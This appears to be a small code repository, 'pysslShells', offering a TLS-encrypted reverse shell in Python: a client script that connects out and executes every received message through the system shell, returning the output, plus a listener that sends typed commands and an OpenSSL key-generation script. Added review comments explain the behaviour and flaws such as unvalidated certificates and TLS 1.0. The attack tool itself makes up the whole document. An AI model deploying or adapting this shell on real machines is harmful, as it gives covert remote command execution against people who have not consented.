├── README.md
├── gencrts.sh
└── reverse
    ├── connect.py
    └── handle.py


/README.md:
--------------------------------------------------------------------------------
# pysslShells
Finally, reverse/bind shells written in python, encrypted with ssl!

--------------------------------------------------------------------------------
/gencrts.sh:
--------------------------------------------------------------------------------
#!/bin/sh
# Generate keys for ssl socket
#
# Writes a private key (server.key) and a self-signed certificate (server.crt)
# to the current directory.
# NOTE(review): reverse/handle.py loads 'ssl.crt' and 'ssl.key', not the
# server.crt / server.key names produced here.

# 2048-bit RSA key, stored 3DES-encrypted under a passphrase.
openssl genrsa -des3 -out server.orig.key 2048
# Re-write the key without the passphrase: server.key is an unencrypted private key on disk.
openssl rsa -in server.orig.key -out server.key
# Certificate signing request for that key.
openssl req -new -key server.key -out server.csr
# Sign the request with its own key: a self-signed certificate valid for 365 days, chained to no CA.
openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt

exit

--------------------------------------------------------------------------------
/reverse/connect.py:
--------------------------------------------------------------------------------
# Client half of the pair: connects out to host:port over TLS, then passes every
# message it receives to the local shell and sends the output back.
# What the code below makes observable to a defender: an outbound TLS 1.0 session
# to port 9999, and one shell child process per received message.
import os
import socket
import subprocess
import ssl

# Create a socket
def socket_create():
    """Set the global target (host, port) and build the TLS-wrapped socket `ssls`.

    ssl.wrap_socket is called without ca_certs or cert_reqs, so its default of
    ssl.CERT_NONE applies: the channel is encrypted, but the peer certificate is
    not validated. ssl.wrap_socket is deprecated since Python 3.7 and removed in
    3.12; ssl.PROTOCOL_TLSv1 fixes the protocol version at TLS 1.0.
    A socket.error is printed and otherwise ignored.
    """
    try:
        global host
        global port
        global ssls
        host = '127.0.0.1'
        port = 9999
        s = socket.socket()  # local name only; no global `s` is declared in this function
        ssls = wrappedSocket = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)  # wrappedSocket is not used again
    except socket.error as msg:
        print("Socket creation error: " + str(msg))


# Connect to a remote socket
def socket_connect():
    """Connect the global `ssls` to (host, port); a socket.error is printed, not re-raised."""
    try:
        global host
        global port
        global s  # declared, but `s` is not referenced in this function
        ssls.connect((host, port))
    except socket.error as msg:
        print("Socket connection error: " + str(msg))


# Receive commands from remote server and run on local machine
def receive_commands():
    """Loop forever: read up to 1024 bytes from `ssls`, execute them, send the result.

    Every non-empty message is decoded as UTF-8 and run through the shell
    (shell=True). stdout and stderr are concatenated and sent back, followed by
    the current working directory and '> ' as a prompt.
    """
    global s
    while True:
        data = ssls.recv(1024)
        # Prefix test only: any message starting with 'cd' changes directory to
        # data[3:], and the same message is still handed to the shell below.
        if data[:2].decode("utf-8") == 'cd':
            os.chdir(data[3:].decode("utf-8"))
        if len(data) > 0:
            # Network input is executed as-is by the shell; nothing filters or restricts it.
            cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            output_bytes = cmd.stdout.read() + cmd.stderr.read()
            # NOTE(review): on Python 3, str() of a bytes object yields its "b'...'" repr,
            # not decoded text; confirm which interpreter this file targets.
            output_str = str(output_bytes)
            ssls.send(str.encode(output_str + str(os.getcwd()) + '> '))
            print(output_str)  # the output is also echoed on the local stdout
    # NOTE(review): the loop above has no break, so this line is not reached in
    # normal flow; `s` is also never assigned at module scope in this file.
    s.close()


def main():
    """Run the three stages in order: create the socket, connect, enter the command loop."""
    socket_create()
    socket_connect()
    receive_commands()


# No __main__ guard: importing this module also starts the connection.
main()

--------------------------------------------------------------------------------
/reverse/handle.py:
--------------------------------------------------------------------------------
# Listener half of the pair: waits on port 9999 with TLS, accepts one client and
# relays lines typed on stdin to it, printing each reply.
from __future__ import print_function
import socket
import sys
import ssl
cmd = ""  # module-level; send_commands assigns its own local `cmd`

def socket_create():
    """Create the global listening socket `s`, TLS-wrapped with ssl.crt / ssl.key.

    Both files are read from the current working directory. ssl.wrap_socket and
    ssl.PROTOCOL_TLSv1 are deprecated APIs (wrap_socket is removed in Python 3.12);
    the protocol version is fixed at TLS 1.0.
    A socket.error is printed and otherwise ignored.
    """
    try:
        global host
        global port
        global s
        host = ''  # empty host: the later bind() listens on every local interface
        port = 9999
        s = socket.socket()
        s = ssl.wrap_socket(s, certfile='ssl.crt', keyfile='ssl.key', ssl_version=ssl.PROTOCOL_TLSv1)
    except socket.error as msg:
        print("Socket creation error: " + str(msg))


# Bind socket to port (the host and port the communication will take place) and wait for connection from client
def socket_bind():
    """Bind `s` to (host, port) and start listening with a backlog of 5.

    On socket.error the function prints the error and calls itself again, with
    no delay and no retry limit.
    """
    try:
        global host
        global port
        global s
        print("Binding socket to port: " + str(port))
        s.bind((host, port))
        s.listen(5)
    except socket.error as msg:
        print("Socket binding error: " + str(msg) + "\n" + "Retrying...")
        socket_bind()


# Establish connection with client (socket must be listening for them)
def socket_accept():
    """Block until one client connects, print its address, run the command loop, then close."""
    conn, address = s.accept()
    print("Connection has been established | " + "IP " + address[0] + " | Port " + str(address[1]))
    send_commands(conn)
    conn.close()


# Send commands
def send_commands(conn):
    """Read lines from stdin and send each non-empty one to `conn`, printing the reply.

    'quit' closes the connection and the listening socket and exits the process.
    """
    while True:
        # NOTE(review): raw_input exists only on Python 2, which matches the
        # __future__ import at the top of this file.
        cmd = raw_input()
        if cmd == 'quit':
            conn.close()
            s.close()
            sys.exit()
        if len(str.encode(cmd)) > 0:
            conn.send(str.encode(cmd))
            # A single recv: at most 1024 bytes of the reply are read per command.
            client_response = str(conn.recv(1024))
            print(client_response, end="")


def main():
    """Run the three stages in order: create the socket, bind and listen, accept one client."""
    socket_create()
    socket_bind()
    socket_accept()


# No __main__ guard: importing this module also starts the listener.
main()

--------------------------------------------------------------------------------